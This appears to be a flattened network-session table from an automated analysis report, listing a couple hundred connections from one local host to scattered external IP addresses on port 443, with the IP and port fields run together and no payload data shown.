                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17086192.168.2.2346650170.220.119.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17087192.168.2.2355098217.117.21.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17088192.168.2.233969238.33.215.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17089192.168.2.2346880202.109.174.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17090192.168.2.2343156190.16.17.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17091192.168.2.236019673.162.108.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17092192.168.2.2338394190.147.212.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17093192.168.2.2343714204.5.245.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17094192.168.2.2344044151.84.66.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17095192.168.2.2339426149.75.150.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17096192.168.2.233746079.170.73.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17097192.168.2.2348322120.158.112.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17098192.168.2.23382124.163.254.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17099192.168.2.2339504189.152.46.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17100192.168.2.234083820.153.12.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17101192.168.2.234529637.8.146.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17102192.168.2.233410080.113.195.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17103192.168.2.2358748166.0.124.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17104192.168.2.235631482.142.207.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17105192.168.2.2358854163.81.195.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17106192.168.2.235476289.203.139.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17107192.168.2.2348394180.11.95.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17108192.168.2.2334756136.166.245.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17109192.168.2.2345058212.128.244.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17110192.168.2.2351282199.68.241.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17111192.168.2.2348846190.87.40.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17112192.168.2.233850278.143.78.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17113192.168.2.235752653.179.44.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17114192.168.2.233617223.138.162.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17115192.168.2.2354484217.156.38.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17116192.168.2.2344772138.29.92.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17117192.168.2.2338702180.21.152.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17118192.168.2.2334028177.254.112.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17119192.168.2.234448699.66.153.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17120192.168.2.2333346203.187.201.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17121192.168.2.2343850170.200.205.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17122192.168.2.2338228148.203.6.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17123192.168.2.2354604117.172.80.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17124192.168.2.2350418166.223.220.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17125192.168.2.2344734149.246.214.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17126192.168.2.2343708203.255.109.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17127192.168.2.235434414.124.99.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17128192.168.2.235425496.77.157.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17129192.168.2.235896042.135.171.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17130192.168.2.2344732166.152.95.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17131192.168.2.2334916146.220.48.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17132192.168.2.236056018.160.126.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17133192.168.2.2357866184.60.159.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17134192.168.2.235328669.120.32.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17135192.168.2.233328899.115.192.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17136192.168.2.234965641.144.198.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17137192.168.2.234627267.255.34.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17138192.168.2.234365093.135.74.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17139192.168.2.2356172159.5.131.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17140192.168.2.2346422177.138.198.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17141192.168.2.2357576219.87.146.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17142192.168.2.2351418158.169.133.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17143192.168.2.236034440.1.84.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17144192.168.2.2341692121.186.234.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17145192.168.2.2355778106.155.142.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17146192.168.2.2345394220.126.73.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17147192.168.2.2353038179.139.98.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17148192.168.2.234878484.162.147.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17149192.168.2.2333758120.146.0.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17150192.168.2.234796224.255.83.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17151192.168.2.2336970165.131.248.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17152192.168.2.234376076.6.61.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17153192.168.2.2343466175.202.214.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17154192.168.2.2346552141.252.29.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17155192.168.2.2346116101.53.224.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17156192.168.2.2348746213.136.11.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17157192.168.2.2337508113.83.21.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17158192.168.2.2351774186.141.223.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17159192.168.2.2336436201.201.196.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17160192.168.2.235521044.177.29.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17161192.168.2.2356992113.57.104.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17162192.168.2.2335116135.71.47.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17163192.168.2.235322035.164.85.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17164192.168.2.235404257.56.135.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17165192.168.2.235649825.179.57.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17166192.168.2.2360252154.47.42.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17167192.168.2.2345814201.54.133.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17168192.168.2.2353942103.127.255.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17169192.168.2.233667876.88.227.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17170192.168.2.234452276.210.67.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17171192.168.2.234783617.140.220.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17172192.168.2.2342172130.29.106.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17173192.168.2.2343428201.85.250.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17174192.168.2.2351720139.67.221.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17175192.168.2.235549890.239.10.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17176192.168.2.2334144154.130.129.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17177192.168.2.2353550189.188.23.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17178192.168.2.2360794101.20.119.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17179192.168.2.234687485.96.213.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17180192.168.2.2339982108.142.104.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17181192.168.2.2355636131.218.240.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17182192.168.2.2357310162.238.165.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17183192.168.2.2338014139.147.71.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17184192.168.2.2354384155.103.246.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17185192.168.2.2355668109.202.143.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17186192.168.2.235547442.57.49.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17187192.168.2.233415024.127.97.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17188192.168.2.235277090.179.119.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17189192.168.2.235432831.79.59.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17190192.168.2.2355672113.35.16.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17191192.168.2.233396879.28.179.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17192192.168.2.2346926167.154.22.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17193192.168.2.2344606193.24.88.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17194192.168.2.233424086.161.3.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17195192.168.2.23342662.155.98.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17196192.168.2.2344746165.130.7.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17197192.168.2.23395881.36.138.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17198192.168.2.2359258223.218.212.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17199192.168.2.23421989.100.243.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17200192.168.2.23587805.238.226.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17201192.168.2.2354454183.99.96.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17202192.168.2.2360200207.77.230.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17203192.168.2.2348650216.227.8.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17204192.168.2.2351736129.165.52.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17205192.168.2.2336910138.80.223.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17206192.168.2.2340038118.87.4.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17207192.168.2.235575217.82.100.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17208192.168.2.2350098192.119.37.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17209192.168.2.2360310221.117.169.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17210192.168.2.2340298138.129.245.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17211192.168.2.2347166210.227.120.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17212192.168.2.2337036154.66.156.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17213192.168.2.2340956123.95.249.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17214192.168.2.234678824.204.76.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17215192.168.2.2343372143.21.118.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17216192.168.2.2355966158.243.145.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17217192.168.2.235823654.15.141.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17218192.168.2.2334938136.203.112.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17219192.168.2.234385640.149.83.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17220192.168.2.23582804.111.215.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17221192.168.2.2342136190.108.226.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17222192.168.2.234893034.122.188.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17223192.168.2.2359534131.169.131.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17224192.168.2.2353478197.25.241.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17225192.168.2.235085850.66.11.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17226192.168.2.2342754200.154.137.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17227192.168.2.235264644.33.119.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17228192.168.2.2357954213.54.216.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17229192.168.2.2350630116.152.26.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17230192.168.2.2353272191.164.80.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17231192.168.2.233649263.244.170.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17232192.168.2.234700266.240.151.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17233192.168.2.2346564186.255.21.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17234192.168.2.234831238.179.146.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17235192.168.2.236016086.58.170.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17236192.168.2.2340546194.190.233.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17237192.168.2.2334242141.102.34.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17238192.168.2.236001032.226.210.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17239192.168.2.2349820198.115.253.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17240192.168.2.2346534205.72.21.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17241192.168.2.2343786112.8.66.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17242192.168.2.2336930219.176.172.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17243192.168.2.2353094169.48.28.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17244192.168.2.2338922115.10.177.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17245192.168.2.2342564148.16.204.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17246192.168.2.234034251.127.136.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17247192.168.2.234521681.145.229.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17248192.168.2.2344132191.99.37.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17249192.168.2.234440054.48.92.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17250192.168.2.2360032187.113.168.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17251192.168.2.2335962101.255.214.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17252192.168.2.2337334182.209.70.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17253192.168.2.236087873.229.238.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17254192.168.2.235363081.192.243.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17255192.168.2.2344198167.63.121.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17256192.168.2.235954661.38.107.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17257192.168.2.236028239.12.159.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17258192.168.2.2355128202.230.86.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17259192.168.2.2333932150.154.55.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17260192.168.2.235918639.184.217.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17261192.168.2.2356780206.84.200.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17262192.168.2.234965425.179.233.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17263192.168.2.2351686148.45.53.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17264192.168.2.234256894.26.147.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17265192.168.2.2358832177.47.243.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17266192.168.2.235374469.5.233.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17267192.168.2.2352274150.27.39.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17268192.168.2.235071241.219.1.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17269192.168.2.2346604104.253.94.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17270192.168.2.234833298.213.237.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17271192.168.2.234945671.193.14.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17272192.168.2.23346502.58.113.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17273192.168.2.2332896201.179.179.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17274192.168.2.236024450.160.80.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17275192.168.2.235361471.25.159.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17276192.168.2.2337602186.45.142.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17277192.168.2.2333618218.169.118.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17278192.168.2.233750470.119.195.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17279192.168.2.2335892178.175.95.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17280192.168.2.233440690.21.127.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17281192.168.2.233866819.205.5.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17282192.168.2.235386431.210.210.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17283192.168.2.2358844223.98.159.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17284192.168.2.2334116212.51.105.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17285192.168.2.23426629.50.51.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17286192.168.2.233395072.159.134.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17287192.168.2.234808834.136.160.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17288192.168.2.2351608125.133.59.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17289192.168.2.2334178143.36.222.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17290192.168.2.2359036111.122.177.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17291192.168.2.233470867.90.49.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17292192.168.2.233728831.56.30.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17293192.168.2.233899025.228.120.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17294192.168.2.235566261.118.149.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17295192.168.2.2347490197.30.252.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17296192.168.2.234112695.183.20.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17297192.168.2.2359458154.72.80.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17298192.168.2.2336312200.231.104.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17299192.168.2.234616618.40.29.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17300192.168.2.234897644.147.183.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17301192.168.2.2335480180.189.138.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17302192.168.2.2355356134.236.155.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17303192.168.2.2345886151.203.212.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17304192.168.2.2344020205.221.77.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17305192.168.2.2344134168.152.229.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17306192.168.2.2360160152.34.99.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
